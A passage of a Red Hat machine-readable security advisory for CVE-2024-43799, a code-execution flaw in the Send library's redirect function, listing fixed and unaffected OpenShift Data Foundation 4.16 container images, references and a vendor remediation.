"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
